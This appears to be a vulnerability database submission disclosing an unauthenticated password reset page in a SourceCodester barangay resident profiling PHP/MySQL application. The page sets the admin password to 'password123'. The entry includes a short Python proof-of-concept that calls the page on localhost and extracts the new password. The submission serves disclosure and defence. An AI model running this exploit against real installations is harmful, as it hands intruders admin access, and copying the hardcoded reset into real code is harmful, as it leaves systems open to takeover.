| शीर्षक | SourceCodester Barangay Resident Profiling and Information Management System (BRPMS) in PHP/MySQL 0 Unverified Password Change |
|---|
| विवरण | During the assessment of the "Barangay Resident Profiling and Information Management System (BRPMS) in PHP/MySQL". It was observed that the application developer has kept a hard reset password page at "passsword_reset.php". This allows any external user or threat actor to simply call the page and hard reset the password to 'password123'.
Thus, allowing any user/threat actor to gain access to the "admin" user with its default credentials. It is highly possible that when this application is used in the production by the users or any organization, they might miss to delete the page, as it will allow users/threat actors to abuse this functionality to gain unauthorized access to the admin user and make unauthorized changes.
This can be validated in "password_reset.php", on line 20.
$new_password = 'password123';
Python3 Exploit Code:
import re
import requests
url = "http://localhost/BRPMS_SANFABIAN/password_reset.php"
resp = requests.get(url, timeout=10)
if resp.status_code == 200:
match = re.search(r'Password:</strong>\s*<code>(.*?)</code>', resp.text, re.IGNORECASE)
if match:
print(match.group(1))
else:
print("Password field not found.")
else:
print("Request failed with status:", resp.status_code) |
|---|
| उपयोगकर्ता | Kamran Saifullah (UID 4218) |
|---|
| सबमिशन | 23/05/2026 08:50 PM (17 दिन पहले) |
|---|
| संयम | 07/06/2026 05:53 PM (15 days later) |
|---|
| स्थिति | स्वीकृत |
|---|
| VulDB प्रविष्टि | 369135 [SourceCodester Barangay Resident Profiling and Information Management System Password Reset passsword_reset.php कमजोर प्रमाणीकरण] |
|---|
| अंक | 17 |
|---|